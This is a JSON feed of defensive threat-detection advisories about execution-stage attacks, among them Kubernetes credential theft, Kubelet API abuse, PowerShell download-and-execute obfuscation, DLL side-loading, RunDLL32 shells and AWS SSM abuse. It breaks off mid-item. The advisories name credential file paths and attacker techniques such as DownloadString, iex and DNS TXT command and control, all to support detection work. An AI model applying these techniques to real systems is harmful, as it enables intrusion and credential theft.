{"description":"Trending threats, MITRE ATT\u0026CK coverage, and detection metadata — refreshed continuously.","feed_url":"https://feed.craftedsignal.io/tags/execution/","home_page_url":"https://feed.craftedsignal.io/","items":[{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Elastic License v2"],"_cs_severities":["high"],"_cs_tags":["kubernetes","credential-access","execution"],"_cs_type":"advisory","_cs_vendors":["Elastic"],"content_html":"\u003cp\u003eThis detection identifies Kubernetes pod exec sessions accessing sensitive files or credential paths. The goal is to detect attackers attempting to steal credentials or configuration information from within Kubernetes pods. This often occurs after initial access and may precede lateral movement, privilege escalation, or data exfiltration. The detection focuses on command lines that reference paths related to service account tokens, kubelet configuration, host identity stores, common private keys, keystore extensions, process environment dumps, and configuration files with embedded secrets. The rule is designed to catch both interactive and scripted access, and includes exclusions for benign reads of resolv.conf.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAttacker gains initial access to a Kubernetes cluster, potentially through a compromised application or misconfigured service.\u003c/li\u003e\n\u003cli\u003eAttacker uses \u003ccode\u003ekubectl exec\u003c/code\u003e or similar tools to execute commands within a pod.\u003c/li\u003e\n\u003cli\u003eThe executed command attempts to read sensitive files or directories within the pod\u0026rsquo;s filesystem, such as \u003ccode\u003e/var/run/secrets/kubernetes.io/serviceaccount/token\u003c/code\u003e to obtain the pod\u0026rsquo;s service account token.\u003c/li\u003e\n\u003cli\u003eThe command may also target host-level files if the pod has hostPath mounts or runs in a privileged context, like \u003ccode\u003e/etc/shadow\u003c/code\u003e or \u003ccode\u003e/etc/passwd\u003c/code\u003e for credential access.\u003c/li\u003e\n\u003cli\u003eThe attacker may attempt to dump process environments via \u003ccode\u003e/proc/\u0026lt;pid\u0026gt;/environ\u003c/code\u003e to extract sensitive information stored as environment variables.\u003c/li\u003e\n\u003cli\u003eThe attacker leverages obtained credentials or configuration to move laterally to other pods or nodes within the cluster.\u003c/li\u003e\n\u003cli\u003eThe attacker escalates privileges within the cluster by abusing stolen service account tokens or node credentials.\u003c/li\u003e\n\u003cli\u003eThe final objective is to exfiltrate sensitive data, deploy malicious workloads, or disrupt services within the Kubernetes environment.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eA successful attack can lead to the compromise of sensitive data, including credentials, configuration files, and application secrets. This can enable attackers to move laterally within the Kubernetes cluster, escalate privileges, and potentially gain control over the entire environment. The severity of the impact depends on the sensitivity of the data exposed and the level of access achieved by the attacker.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the provided Sigma rule to your SIEM to detect sensitive file access within Kubernetes pod exec sessions.\u003c/li\u003e\n\u003cli\u003eInvestigate any alerts triggered by the Sigma rule, focusing on the \u003ccode\u003eEsql.access_type\u003c/code\u003e field to prioritize incidents.\u003c/li\u003e\n\u003cli\u003eReview and tighten RBAC permissions for pod exec to limit access to authorized users and service accounts.\u003c/li\u003e\n\u003cli\u003eImplement admission controls to prevent pods from running in privileged mode or using hostPath mounts unless absolutely necessary.\u003c/li\u003e\n\u003cli\u003eMonitor Kubernetes audit logs for suspicious \u003ccode\u003ekubectl exec\u003c/code\u003e activity, including unusual command lines or access patterns.\u003c/li\u003e\n\u003cli\u003eRegularly rotate Kubernetes service account tokens and other sensitive credentials to minimize the impact of potential breaches.\u003c/li\u003e\n\u003cli\u003eUse the provided Kubernetes audit log query to proactively search for historical instances of sensitive file access.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-05-04T21:42:34Z","date_published":"2026-05-04T21:42:34Z","id":"/briefs/2024-01-kubernetes-pod-exec-sensitive-file-access/","summary":"This rule detects Kubernetes pod exec sessions where the decoded command line references sensitive files or paths such as mounted service account tokens, kubelet and control-plane configuration, host identity stores, private keys, and process environment dumps, aiming to identify potential lateral movement, privilege escalation, or credential theft.","title":"Kubernetes Pod Exec Sensitive File or Credential Path Access","url":"https://feed.craftedsignal.io/briefs/2024-01-kubernetes-pod-exec-sensitive-file-access/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["high"],"_cs_tags":["kubernetes","kubelet","lateral-movement","discovery","execution","linux"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eThis detection identifies potential direct Kubelet API access attempts on Linux systems. The Kubelet, acting as the primary node agent, exposes an API accessible via ports 10250 and 10255. Attackers may exploit this API to enumerate pods, fetch logs, or even attempt remote execution. This access can lead to significant breaches in Kubernetes environments, facilitating discovery, lateral movement, and ultimately, compromise of sensitive data or control over cluster resources. The detection focuses on identifying process executions where the command-line arguments contain URLs targeting these Kubelet ports, indicating a potential attempt to interact with the Kubelet API directly.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker gains initial access to a compromised host within the Kubernetes cluster or a host with network access to the Kubelet ports.\u003c/li\u003e\n\u003cli\u003eThe attacker uses a utility like \u003ccode\u003ecurl\u003c/code\u003e, \u003ccode\u003ewget\u003c/code\u003e, \u003ccode\u003epython\u003c/code\u003e, or similar tools to craft an HTTP request targeting the Kubelet API on ports 10250 or 10255.\u003c/li\u003e\n\u003cli\u003eThe request includes a path like \u003ccode\u003e/pods\u003c/code\u003e, \u003ccode\u003e/runningpods\u003c/code\u003e, \u003ccode\u003e/metrics\u003c/code\u003e, \u003ccode\u003e/exec\u003c/code\u003e, or \u003ccode\u003e/containerLogs\u003c/code\u003e to gather information about the cluster\u0026rsquo;s state and configuration.\u003c/li\u003e\n\u003cli\u003eThe attacker examines the response to identify potential targets for lateral movement, such as specific pods or containers of interest.\u003c/li\u003e\n\u003cli\u003eThe attacker attempts to execute commands within a container using the \u003ccode\u003e/exec\u003c/code\u003e endpoint, potentially leveraging exposed service account tokens or other credentials.\u003c/li\u003e\n\u003cli\u003eThe attacker uses gathered information to move laterally to other pods or nodes within the cluster, escalating privileges as they go.\u003c/li\u003e\n\u003cli\u003eThe attacker compromises sensitive data or critical applications running within the Kubernetes cluster.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation can lead to full cluster compromise. Attackers can gain unauthorized access to sensitive data, disrupt critical applications, and move laterally to other resources within the Kubernetes environment. This could lead to significant financial losses, reputational damage, and legal liabilities. The potential impact includes data breaches, denial of service, and complete control over the Kubernetes infrastructure.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003eKubelet API Access via Process Arguments\u003c/code\u003e to your SIEM to detect suspicious process executions.\u003c/li\u003e\n\u003cli\u003eRestrict access to Kubelet ports 10250/10255 at the network layer to limit pod-to-node or host-to-node traffic as recommended in the overview section.\u003c/li\u003e\n\u003cli\u003eHarden Kubelet configuration by disabling anonymous authentication and enforcing webhook authentication/authorization as described in the overview section.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-05-04T21:18:23Z","date_published":"2026-05-04T21:18:23Z","id":"/briefs/2024-01-09-kubelet-access/","summary":"This rule detects potential direct Kubelet API access attempts on Linux by identifying process executions whose arguments contain URLs targeting Kubelet ports (10250/10255) enabling discovery and lateral movement in Kubernetes environments.","title":"Potential Direct Kubelet API Access via Process Arguments","url":"https://feed.craftedsignal.io/briefs/2024-01-09-kubelet-access/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Microsoft Defender XDR","Elastic Defend"],"_cs_severities":["medium"],"_cs_tags":["defense-evasion","execution","windows"],"_cs_type":"advisory","_cs_vendors":["Elastic","Microsoft","Crowdstrike","SentinelOne"],"content_html":"\u003cp\u003eThis detection identifies suspicious child processes spawned by Zoom.exe, potentially indicating an attempt to evade detection or exploit vulnerabilities within the Zoom application. The rule focuses on detecting instances where command interpreters like cmd.exe, PowerShell, or PowerShell ISE are launched as child processes of Zoom. This behavior can be indicative of an attacker attempting to execute malicious commands or scripts within the context of the Zoom application, potentially escalating privileges or gaining unauthorized access to system resources. It\u0026rsquo;s crucial for defenders to investigate such occurrences, as they may signify ongoing exploitation or malicious activity leveraging Zoom as an initial access vector.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eUser launches the Zoom application (Zoom.exe).\u003c/li\u003e\n\u003cli\u003eA vulnerability in Zoom is exploited, or the user is socially engineered into running a malicious command.\u003c/li\u003e\n\u003cli\u003eZoom.exe spawns a child process, such as cmd.exe, powershell.exe, pwsh.exe, or powershell_ise.exe.\u003c/li\u003e\n\u003cli\u003eThe spawned process executes commands or scripts, potentially downloading or executing malware.\u003c/li\u003e\n\u003cli\u003eThe malicious script or command performs reconnaissance activities on the system.\u003c/li\u003e\n\u003cli\u003eThe script establishes persistence by creating a scheduled task or modifying registry keys.\u003c/li\u003e\n\u003cli\u003eThe attacker gains remote access to the compromised system.\u003c/li\u003e\n\u003cli\u003eThe attacker performs lateral movement and data exfiltration.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation could allow attackers to execute arbitrary commands, escalate privileges, and compromise the affected system. Depending on the user\u0026rsquo;s privileges, attackers could gain access to sensitive data, install malware, or pivot to other systems on the network. The impact ranges from data breaches to complete system compromise, potentially affecting all users within the organization who utilize the Zoom application.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Suspicious Zoom Child Process\u0026rdquo; to your SIEM to detect command interpreters spawned by Zoom.exe. Tune the rule for your environment to minimize false positives.\u003c/li\u003e\n\u003cli\u003eEnable Sysmon process creation logging (Event ID 1) to capture detailed information about process executions, which is essential for the Sigma rule above.\u003c/li\u003e\n\u003cli\u003eInvestigate any alerts generated by the Sigma rule, focusing on the command-line arguments and network connections of the spawned processes.\u003c/li\u003e\n\u003cli\u003eMonitor Windows Security Event Logs for process creation events related to Zoom.exe and its child processes to identify suspicious behavior.\u003c/li\u003e\n\u003cli\u003eConsider implementing application control policies to restrict the execution of unauthorized processes within the Zoom application context.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-05-04T14:17:05Z","date_published":"2026-05-04T14:17:05Z","id":"/briefs/2024-11-suspicious-zoom-child-process/","summary":"A suspicious Zoom child process was detected, indicating a potential attempt to run unnoticed by masquerading as Zoom.exe or exploiting a vulnerability, resulting in the execution of cmd.exe, powershell.exe, pwsh.exe, or powershell_ise.exe.","title":"Suspicious Zoom Child Process Execution","url":"https://feed.craftedsignal.io/briefs/2024-11-suspicious-zoom-child-process/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Elastic Defend","Microsoft Defender XDR","Sysmon","Crowdstrike","SentinelOne Cloud Funnel","Elastic Endgame"],"_cs_severities":["medium"],"_cs_tags":["powershell","malware","execution"],"_cs_type":"advisory","_cs_vendors":["Elastic","Microsoft","Crowdstrike","SentinelOne"],"content_html":"\u003cp\u003eThis detection rule identifies the execution of PowerShell with suspicious argument values on Windows systems. This behavior is frequently associated with malware installation and other malicious activities. PowerShell is a powerful scripting language, and adversaries often exploit its capabilities to execute malicious scripts, download payloads, and obfuscate commands. The rule focuses on detecting patterns such as encoded commands, suspicious downloads (e.g., using WebClient or Invoke-WebRequest), and various obfuscation techniques used to evade detection. The rule is designed to work with various data sources, including Elastic Defend, Windows Security Event Logs, Sysmon, and third-party EDR solutions like CrowdStrike, Microsoft Defender XDR, and SentinelOne, enhancing its applicability across different environments.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker gains initial access to a Windows system (e.g., through phishing or exploiting a vulnerability).\u003c/li\u003e\n\u003cli\u003eThe attacker uses PowerShell to download a malicious payload from a remote server using commands like \u003ccode\u003eDownloadFile\u003c/code\u003e or \u003ccode\u003eDownloadString\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe downloaded payload is often encoded or obfuscated to evade detection. Common techniques include Base64 encoding, character manipulation, and compression.\u003c/li\u003e\n\u003cli\u003ePowerShell is then used to decode or deobfuscate the payload using methods like \u003ccode\u003e[Convert]::FromBase64String\u003c/code\u003e or \u003ccode\u003e[char[]](...) -join ''\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe deobfuscated payload is executed directly in memory using techniques like \u003ccode\u003eiex\u003c/code\u003e (Invoke-Expression) or \u003ccode\u003eReflection.Assembly.Load\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe executed payload performs malicious actions, such as installing malware, establishing persistence, or exfiltrating data.\u003c/li\u003e\n\u003cli\u003eThe attacker may use techniques like \u003ccode\u003eWebClient\u003c/code\u003e to download files from a remote URL.\u003c/li\u003e\n\u003cli\u003eCommands like \u003ccode\u003enslookup -q=txt\u003c/code\u003e are used for command and control.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation can lead to malware installation, data theft, system compromise, and further propagation of the attack within the network. The detection of suspicious PowerShell arguments helps to identify and prevent these malicious activities before significant damage can occur. Without proper detection, attackers can maintain persistence, escalate privileges, and compromise sensitive data. The rule helps defenders identify and respond to these threats quickly, minimizing the impact of potential attacks.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rules provided in this brief to your SIEM to detect suspicious PowerShell activity.\u003c/li\u003e\n\u003cli\u003eEnable Sysmon process creation logging with command line arguments to ensure the necessary data is captured for the Sigma rules to function effectively.\u003c/li\u003e\n\u003cli\u003eInvestigate any alerts generated by the Sigma rules to determine the legitimacy of the PowerShell activity and take appropriate remediation steps.\u003c/li\u003e\n\u003cli\u003eContinuously tune the Sigma rules based on your environment to reduce false positives and improve detection accuracy.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-05-04T14:17:05Z","date_published":"2026-05-04T14:17:05Z","id":"/briefs/2024-09-susp-powershell-args/","summary":"This rule identifies the execution of PowerShell with suspicious argument values, often observed during malware installation, by detecting unusual PowerShell arguments indicative of abuse, focusing on patterns like encoded commands, suspicious downloads, and obfuscation techniques.","title":"Suspicious Windows PowerShell Arguments Detected","url":"https://feed.craftedsignal.io/briefs/2024-09-susp-powershell-args/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["WinWord.exe","EXPLORER.EXE","w3wp.exe","DISM.EXE","Microsoft Defender XDR"],"_cs_severities":["medium"],"_cs_tags":["defense-evasion","execution","dll-side-loading","windows"],"_cs_type":"advisory","_cs_vendors":["Microsoft"],"content_html":"\u003cp\u003eThis detection rule identifies instances of Windows trusted programs such as WinWord.exe, EXPLORER.EXE, w3wp.exe, and DISM.EXE executing from unusual paths or after being renamed, which may indicate DLL side-loading. DLL side-loading is a defense evasion technique where a malicious DLL is placed in the same directory as a legitimate executable. When the executable runs, it may load the malicious DLL instead of the legitimate one, allowing the attacker to execute arbitrary code within the context of the trusted process. The detection logic focuses on process executions that deviate from standard installation paths. The targeted processes are commonly used and often whitelisted, making this a potent technique for adversaries to bypass security controls.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker gains initial access to the system (e.g., through phishing or exploitation of a vulnerability).\u003c/li\u003e\n\u003cli\u003eThe attacker identifies a trusted Windows program vulnerable to DLL side-loading (WinWord.exe, EXPLORER.EXE, w3wp.exe, or DISM.EXE).\u003c/li\u003e\n\u003cli\u003eThe attacker drops a malicious DLL into a directory where the trusted program is expected to load DLLs from, often alongside a renamed or copied version of the legitimate executable.\u003c/li\u003e\n\u003cli\u003eAlternatively, the attacker renames the trusted program and places it in a non-standard path.\u003c/li\u003e\n\u003cli\u003eThe attacker executes the renamed or moved trusted program from the non-standard path.\u003c/li\u003e\n\u003cli\u003eThe trusted program loads the malicious DLL due to DLL search order hijacking.\u003c/li\u003e\n\u003cli\u003eThe malicious DLL executes arbitrary code within the context of the trusted process.\u003c/li\u003e\n\u003cli\u003eThe attacker achieves persistence, elevates privileges, or performs other malicious activities, potentially evading detection due to the trusted process context.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eA successful DLL side-loading attack allows the attacker to execute arbitrary code within the context of a trusted Microsoft process. This can lead to privilege escalation, persistence, and further compromise of the system. Since the malicious code is running within a trusted process, it can bypass application whitelisting and other security controls, making it difficult to detect. This can lead to data theft, system disruption, or the installation of malware.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Potential DLL Side-Loading via Trusted Microsoft Programs\u0026rdquo; to your SIEM to detect suspicious executions of trusted programs from non-standard paths or with modifications.\u003c/li\u003e\n\u003cli\u003eEnable Sysmon process creation logging (Event ID 1) to provide the necessary data for the Sigma rule to function correctly.\u003c/li\u003e\n\u003cli\u003eReview and tune the exclusion paths in the Sigma rule to avoid false positives from legitimate software updates, custom enterprise applications, or virtual environments.\u003c/li\u003e\n\u003cli\u003eMonitor process execution paths using the Sigma rule \u0026ldquo;Potential DLL Side-Loading via Trusted Microsoft Programs\u0026rdquo; and investigate any deviations from standard installation paths.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-05-04T14:17:05Z","date_published":"2026-05-04T14:17:05Z","id":"/briefs/2026-05-dll-side-loading/","summary":"This rule detects potential DLL side-loading attempts by identifying instances of Windows trusted programs (WinWord.exe, EXPLORER.EXE, w3wp.exe, DISM.EXE) being started after being renamed or from a non-standard path, which is a common technique to evade defenses by side-loading a malicious DLL into the memory space of a trusted process.","title":"Potential DLL Side-Loading via Trusted Microsoft Programs","url":"https://feed.craftedsignal.io/briefs/2026-05-dll-side-loading/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["M365 Defender","Elastic Defend","SentinelOne Cloud Funnel"],"_cs_severities":["low"],"_cs_tags":["execution","command-shell","rundll32"],"_cs_type":"advisory","_cs_vendors":["Microsoft","Elastic","SentinelOne"],"content_html":"\u003cp\u003eAttackers commonly abuse RunDLL32, a legitimate Windows utility, to execute malicious code by hosting it within DLLs. This technique allows adversaries to launch command shells like cmd.exe or PowerShell, effectively bypassing traditional security controls. Defenders should be aware of this technique because it provides a stealthy way for attackers to execute arbitrary commands, potentially leading to further compromise of the system. This activity is detected by monitoring for command shells initiated by RunDLL32, while excluding known benign patterns to reduce false positives. The detection rule was last updated on 2026/05/04 and supports multiple data sources, including Elastic Defend, Microsoft Defender XDR, and Sysmon.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker gains initial access to the system through an exploit or social engineering.\u003c/li\u003e\n\u003cli\u003eThe attacker uses RunDLL32.exe to execute a malicious DLL.\u003c/li\u003e\n\u003cli\u003eRunDLL32.exe loads the specified DLL into memory.\u003c/li\u003e\n\u003cli\u003eThe malicious DLL contains code to execute a command shell (cmd.exe or powershell.exe).\u003c/li\u003e\n\u003cli\u003eRunDLL32.exe spawns a command shell process.\u003c/li\u003e\n\u003cli\u003eThe attacker uses the command shell to execute commands for reconnaissance.\u003c/li\u003e\n\u003cli\u003eThe attacker may use the command shell to download additional payloads.\u003c/li\u003e\n\u003cli\u003eThe attacker leverages the command shell to perform lateral movement.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation allows attackers to execute arbitrary commands on the compromised system. While the rule is rated \u0026ldquo;low\u0026rdquo; severity, this initial access can lead to credential access (T1552) and further lateral movement within the network. Attackers can potentially gain full control of the system, leading to data theft, system disruption, or other malicious activities.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Command Shell Activity Started via RunDLL32\u0026rdquo; to your SIEM and tune for your environment.\u003c/li\u003e\n\u003cli\u003eEnable Sysmon process creation logging (Event ID 1) to provide the necessary data for this detection.\u003c/li\u003e\n\u003cli\u003eReview the process details of RunDLL32.exe to confirm the parent-child relationship with the command shell, helping to reduce false positives.\u003c/li\u003e\n\u003cli\u003eImplement enhanced monitoring for rundll32.exe and related processes to detect similar activities in the future and improve response times.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-05-04T14:17:05Z","date_published":"2026-05-04T14:17:05Z","id":"/briefs/2026-05-rundll32-cmd-shell/","summary":"This rule detects command shell activity, such as cmd.exe or powershell.exe, initiated by RunDLL32, a technique commonly abused by attackers to execute malicious code and bypass security controls.","title":"Command Shell Activity Started via RunDLL32","url":"https://feed.craftedsignal.io/briefs/2026-05-rundll32-cmd-shell/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["AWS Systems Manager Session Manager"],"_cs_severities":["medium"],"_cs_tags":["aws","ssm","session-manager","execution","cloud"],"_cs_type":"advisory","_cs_vendors":["Amazon"],"content_html":"\u003cp\u003eAWS Systems Manager (SSM) Session Manager provides interactive shell access to EC2 instances and hybrid nodes without the need for bastion hosts or open inbound ports. Attackers can abuse this functionality by leveraging compromised AWS credentials or IAM roles with \u003ccode\u003essm:StartSession\u003c/code\u003e permissions to gain unauthorized access to target systems. This allows for remote execution of commands and lateral movement within the AWS environment. The technique involves spawning child processes from the SSM session worker process to perform malicious activities. Defenders should monitor for unusual process execution patterns originating from SSM sessions to identify potential abuse.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAttacker gains access to valid AWS credentials or IAM role with \u003ccode\u003essm:StartSession\u003c/code\u003e permissions.\u003c/li\u003e\n\u003cli\u003eAttacker initiates an SSM session to a target EC2 instance or hybrid node using the compromised credentials.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003essm-session-worker\u003c/code\u003e process is started on the target instance to manage the interactive session.\u003c/li\u003e\n\u003cli\u003eAttacker executes commands within the session, spawning child processes from the \u003ccode\u003essm-session-worker\u003c/code\u003e process.\u003c/li\u003e\n\u003cli\u003eAttacker may use scripting languages such as PowerShell or Bash to execute malicious code (e.g., using \u003ccode\u003eawsrunPowerShellScript\u003c/code\u003e or \u003ccode\u003eawsrunShellScript\u003c/code\u003e).\u003c/li\u003e\n\u003cli\u003eThese scripts perform reconnaissance, download additional tools, or attempt credential access.\u003c/li\u003e\n\u003cli\u003eAttacker moves laterally to other instances or resources within the AWS environment.\u003c/li\u003e\n\u003cli\u003eThe ultimate objective is often data exfiltration, privilege escalation, or maintaining persistent access.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation can lead to unauthorized access to sensitive data, compromise of critical systems, and lateral movement within the AWS environment. The impact can range from data breaches to complete control of the compromised infrastructure. The number of affected systems depends on the scope of the compromised credentials and the attacker\u0026rsquo;s ability to move laterally. Organizations using AWS SSM are at risk.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rules in this brief to your SIEM and tune for your environment to detect suspicious child processes spawned by \u003ccode\u003essm-session-worker\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eCorrelate process activity with AWS CloudTrail logs for \u003ccode\u003eStartSession\u003c/code\u003e and related API calls to identify the IAM principal initiating the session (see the overview section for API names).\u003c/li\u003e\n\u003cli\u003eImplement strict IAM policies and regularly review AWS credentials to minimize the risk of credential compromise.\u003c/li\u003e\n\u003cli\u003eMonitor \u003ccode\u003eprocess.command_line\u003c/code\u003e, \u003ccode\u003eprocess.executable\u003c/code\u003e, \u003ccode\u003eprocess.user.name\u003c/code\u003e for unusual activity within SSM sessions.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-05-01T20:57:28Z","date_published":"2026-05-01T20:57:28Z","id":"/briefs/2024-01-aws-ssm-session-manager-abuse/","summary":"Adversaries abuse AWS Systems Manager (SSM) Session Manager to gain remote execution and lateral movement within AWS environments by spawning malicious child processes from the SSM session worker, leveraging legitimate AWS credentials and IAM permissions.","title":"AWS SSM Session Manager Child Process Execution Abuse","url":"https://feed.craftedsignal.io/briefs/2024-01-aws-ssm-session-manager-abuse/"},{"_cs_actors":[],"_cs_cves":[{"cvss":4.3,"id":"CVE-2026-41079"}],"_cs_exploited":false,"_cs_products":["CUPS"],"_cs_severities":["critical"],"_cs_tags":["cups","vulnerability","privilege-escalation","execution","denial-of-service"],"_cs_type":"advisory","_cs_vendors":["CUPS"],"content_html":"\u003cp\u003eMultiple vulnerabilities have been identified in CUPS, a popular open-source printing system. These vulnerabilities can be exploited by an attacker to bypass security measures, execute arbitrary code, escalate privileges, manipulate data, or cause a denial-of-service (DoS) condition. The specifics of the vulnerabilities are not detailed in the source document, but the potential impact suggests a high level of risk. Defenders should monitor CUPS deployments for suspicious activity.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAttacker gains initial access to a system with a vulnerable CUPS installation.\u003c/li\u003e\n\u003cli\u003eThe attacker exploits a vulnerability in CUPS (specific CVE not identified) to bypass authentication or authorization controls.\u003c/li\u003e\n\u003cli\u003eLeveraging the bypassed security measures, the attacker executes arbitrary code within the context of the CUPS service.\u003c/li\u003e\n\u003cli\u003eThe attacker escalates privileges, potentially gaining root or system-level access, due to insecure configurations or further vulnerabilities within CUPS.\u003c/li\u003e\n\u003cli\u003eWith elevated privileges, the attacker manipulates sensitive data related to print jobs, configurations, or user information.\u003c/li\u003e\n\u003cli\u003eAlternatively, the attacker triggers a denial-of-service condition, rendering the printing service unavailable by exploiting a resource exhaustion vulnerability.\u003c/li\u003e\n\u003cli\u003eThe attacker leverages the compromised CUPS service as a pivot point to gain access to other systems on the network.\u003c/li\u003e\n\u003cli\u003eThe final objective is to compromise sensitive data, disrupt printing services, or gain a foothold for further attacks within the network.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of these CUPS vulnerabilities could lead to significant damage, including unauthorized access to sensitive documents, disruption of critical printing services, and potential compromise of other systems on the network. The lack of specific victim numbers or sector targeting in the source document suggests this is a general advisory.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMonitor CUPS server logs for unexpected process execution and privilege escalation attempts (enable process_creation logging and deploy the \u0026ldquo;Detect Suspicious CUPS Process Execution\u0026rdquo; Sigma rule).\u003c/li\u003e\n\u003cli\u003eInspect CUPS configuration files for unauthorized modifications that could indicate malicious activity (enable file_event logging and deploy the \u0026ldquo;Detect Suspicious CUPS Configuration Modification\u0026rdquo; Sigma rule).\u003c/li\u003e\n\u003cli\u003eAnalyze network traffic to and from CUPS servers for anomalous patterns that may indicate exploitation attempts or data exfiltration (enable network_connection logging).\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-30T09:43:58Z","date_published":"2026-04-30T09:43:58Z","id":"/briefs/2026-05-cups-vulns/","summary":"Multiple vulnerabilities in CUPS allow an attacker to bypass security measures, execute arbitrary code, escalate privileges, manipulate data, or cause a denial-of-service condition.","title":"Multiple Vulnerabilities in CUPS","url":"https://feed.craftedsignal.io/briefs/2026-05-cups-vulns/"},{"_cs_actors":[],"_cs_cves":[{"id":"CVE-2025-68741"},{"cvss":7.8,"id":"CVE-2025-38024"},{"cvss":7.8,"id":"CVE-2025-38180"},{"cvss":7.8,"id":"CVE-2026-23111"},{"cvss":7.1,"id":"CVE-2026-23204"}],"_cs_exploited":false,"_cs_products":["Red Hat CodeReady Linux Builder","Red Hat Enterprise Linux"],"_cs_severities":["critical"],"_cs_tags":["vulnerability","kernel","redhat","execution","privilege-escalation","denial-of-service"],"_cs_type":"advisory","_cs_vendors":["Red Hat"],"content_html":"\u003cp\u003eOn April 30, 2026, CERT-FR published an advisory regarding multiple vulnerabilities in the Red Hat Linux kernel. These vulnerabilities, detailed in Red Hat Security Advisories RHSA-2026:10756, RHSA-2026:10996, and RHSA-2026:11313, can lead to significant security risks including arbitrary code execution, privilege escalation, and remote denial of service. The affected systems include various versions and architectures of Red Hat CodeReady Linux Builder and Red Hat Enterprise Linux. Successful exploitation of these vulnerabilities could allow attackers to gain unauthorized access, control systems, or disrupt services, impacting the confidentiality, integrity, and availability of affected systems.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003e\u003cstrong\u003eInitial Compromise (via unconfirmed vector):\u003c/strong\u003e An attacker identifies a vulnerable Red Hat Linux system running an affected kernel version. While the exact exploit vector isn\u0026rsquo;t specified in the advisory, it involves a vulnerability in the kernel.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eExploit 